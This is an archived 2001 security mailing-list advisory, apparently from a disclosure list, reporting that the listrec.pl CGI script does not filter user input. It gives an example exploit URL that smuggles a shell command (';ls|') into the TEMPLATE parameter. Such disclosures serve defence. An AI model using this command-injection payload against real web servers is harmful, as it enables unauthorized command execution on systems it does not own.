Textor Webmasters Ltd (listrec.pl)

From: Alexey Sintsov (don_huanat_private)
Date: Tue Sep 11 2001 - 21:01:24 PDT

Next message: Jeremey A. Mates: "Re: More security problems in Apache on Mac OS X"

Previous message: David Alban: "Re: Draft Bill on privacy/security -- requires certified security technologies in all devices"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Last update (of listrec.pl) Jon Wright 11/11/1998.

This script has vulnerability (does not filter input of the 
user) which allows to carry out commands from 
WebServer.

EXPLOIT:
www.server.com/cgi-bin/common/listrec.pl?
APP=qmh-news&TEMPLATE=;ls| 

XP-TEAM

Next message: Jeremey A. Mates: "Re: More security problems in Apache on Mac OS X"
Previous message: David Alban: "Re: Draft Bill on privacy/security -- requires certified security technologies in all devices"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 11 2001 - 21:13:18 PDT